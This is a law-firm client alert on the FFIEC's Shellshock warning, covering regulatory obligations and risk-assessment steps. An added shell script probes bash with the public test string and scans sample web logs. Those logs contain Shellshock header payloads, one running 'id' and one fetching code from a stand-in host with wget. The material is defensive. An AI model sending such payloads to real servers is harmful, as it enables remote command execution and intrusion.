Federal Financial Regulators Issue Warning on ‘Shellshock’ Security Vulnerability

Ballard Spahr LLP

The Federal Financial Institutions Examination Council (FFIEC) recently issued an alert warning financial institutions of a security vulnerability nicknamed “Shellshock” in software commonly used in servers and other computing devices. The FFIEC said regulators should “expect financial institutions to conduct a risk assessment and address the Shellshock vulnerability” not only in their own systems but also with their third-party service providers.

Consequently, a financial institution’s failure to address this high-profile security issue could be a violation of the Gramm-Leach-Bliley Act’s (GLBA) Safeguards Rule or an unfair, deceptive, or abusive act or practice (UDAAP) under Dodd-Frank. For nonbanking organizations, such a failure could violate Section 5 of the FTC Act. Businesses should act quickly to assess their risks from Shellshock and mitigate their exposure.

This latest vulnerability, found in the Bourne-Again Shell (Bash), mainly affects systems and websites running Linux and other Unix-like operating systems, many of them open source, as well as Apple’s Mac OS X. These operating systems are widely used on servers that host websites and e-mail, on systems that manage back-office operations, and on systems that control facilities’ physical security. The same platforms are also used by many companies to develop customized internal software. Bash is a command interpreter: it provides the interface through which users, and many automated programs, enter commands that execute other programs.

The Shellshock vulnerability stems from a flaw in how Bash processes environment variables: when a variable’s value looks like a function definition, vulnerable versions of Bash also execute any commands that follow it. Because many server programs pass data received from remote users to Bash through environment variables, a remote user can supply crafted input that causes the server to execute commands of the attacker’s choosing, bypassing other security controls. This flaw had existed for decades, but was only recently discovered. Within days of its public disclosure, security researchers observed attackers attempting to exploit it. A successful exploit could enable attackers to inject harmful scripts or malware, intercept encrypted communications, steal user credentials or data, or reach an institution’s internal networks, leading to the loss of data, operational disruptions, or fraud.

Multiple software patches have been released to address Shellshock, and the first of them proved incomplete, so follow-up patches were needed. Security researchers also worry that, because Bash is present on such a wide variety of systems, including network appliances and embedded devices that are not routinely updated, patches will not reach every affected system. The ubiquitous use of Bash makes it a challenge to ensure that all vulnerable systems are accounted for and updated, and that each one has received the complete set of fixes.

In its alert, the FFIEC told financial institutions and other covered entities that it expects them to conduct risk assessments to identify systems vulnerable to Shellshock. This assessment should include:

  • Identifying all servers, systems, and appliances that use vulnerable versions of Bash, applying the necessary software patches, and testing to ensure the patches' effectiveness
  • Applying mechanisms to filter malicious traffic away from vulnerable websites and services
  • Monitoring systems for malicious or unusual activity and updating any detection and prevention systems
  • Ensuring all third-party service providers are taking appropriate actions to identify and mitigate risk and monitoring their efforts
  • Reviewing systems to see if the Shellshock vulnerability has been exploited, and if necessary, determining the potential effects of any breach
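Two of the assessment steps above, testing that a Bash binary is actually patched and reviewing logs for signs of exploitation attempts, can be scripted. The following is an added example and is not code from the FFIEC alert or from the article. It assumes a POSIX shell with grep, awk and sort available, and the access-log lines it scans are constructed for the example. The probe string used for the local check is the widely published test for the original Shellshock bug (CVE-2014-6271): a Bash that fails it is certainly vulnerable, but passing it alone does not prove the later follow-up patches are in place.

```shell
#!/bin/sh
# Added example for the assessment steps above; not part of the FFIEC alert
# or the original article. Two checks a team can script:
#   1. check_shellshock_bash  - probe a bash binary with the public test
#      string for the original Shellshock bug (CVE-2014-6271). A vulnerable
#      bash runs the command appended to a function definition that it
#      imports from the environment; a patched bash treats the variable as
#      plain text.
#   2. shellshock_hits / count_shellshock_hits / shellshock_source_ips -
#      scan web-server access-log text for the "() {" marker that an HTTP
#      header payload must begin with for vulnerable bash to parse it as a
#      function definition.
# The log lines in SAMPLE_LOG are constructed for this example.

# Usage: check_shellshock_bash [path-to-bash]
# Prints one word: "vulnerable", "patched" or "missing" (no such binary).
check_shellshock_bash() {
    bash_bin=${1:-bash}
    if ! command -v "$bash_bin" >/dev/null 2>&1; then
        echo missing
        return 0
    fi
    # The probe value is a function definition followed by an extra command.
    # Only stdout matters: a vulnerable bash echoes "vulnerable" before it
    # runs "echo probe". Warnings printed by partially patched builds go to
    # stderr and are discarded.
    out=$(env x='() { :;}; echo vulnerable' "$bash_bin" -c 'echo probe' 2>/dev/null) || true
    case $out in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# Constructed sample of an Apache-style combined access log. Two lines carry
# the payload marker: one in the User-Agent field, one in the Referer field.
SAMPLE_LOG=$(cat <<'EOF'
10.0.0.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'id'"
10.0.0.9 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :; }; wget http://example.invalid/x" "curl/7.37.0"
10.0.0.9 - - [25/Sep/2014:10:03:40 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
EOF
)

# Usage: shellshock_hits "<log text>"
# Prints every line containing the "() {" marker. Fixed-string matching (-F)
# keeps the parentheses and brace literal, and the marker is matched anywhere
# in the line because the payload can ride in any header the web server
# copies into the CGI environment, not only User-Agent.
shellshock_hits() {
    printf '%s\n' "$1" | grep -F '() {' || true
}

# Usage: count_shellshock_hits "<log text>"   -> number of matching lines
count_shellshock_hits() {
    printf '%s\n' "$1" | grep -c -F '() {' || true
}

# Usage: shellshock_source_ips "<log text>"   -> unique client IPs, one per line
# The client address is the first field of a combined-format log line.
shellshock_source_ips() {
    shellshock_hits "$1" | awk '{ print $1 }' | sort -u
}

# Run stand-alone to see the results for the local bash and the sample log.
printf 'local bash: %s\n' "$(check_shellshock_bash)"
printf 'log lines carrying the marker: %s\n' "$(count_shellshock_hits "$SAMPLE_LOG")"
printf 'source IPs to investigate:\n'
shellshock_source_ips "$SAMPLE_LOG"
```

Two caveats apply when using checks like these in an assessment. The local probe should be run against every Bash binary on a host (some systems carry more than one), and a "patched" result for this one probe does not replace confirming that the vendor's complete fix is installed. The log scan only covers web-facing exposure; Bash can also be reached through other services that pass user-controlled data into environment variables, so those services need their own review.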

The FFIEC advises financial institutions to stay updated on cybersecurity threats through the U.S. Computer Emergency Readiness Team's (US-CERT) portal or through the Financial Services Information Sharing and Analysis Center. Financial institutions and businesses that collect consumers' personally identifiable information should incorporate security alerts from regulators and information-sharing organizations into their information security programs. Failing to respond to the latest security threats—especially those that a regulator warns against—not only puts corporate assets, reputation, and consumer information at higher risk of a costly data breach, but also increases the risk of regulatory action.


DISCLAIMER: Because of the generality of this update, the information provided herein may not be applicable in all situations and should not be acted upon without specific legal advice based on particular situations. Attorney Advertising.

© Ballard Spahr LLP

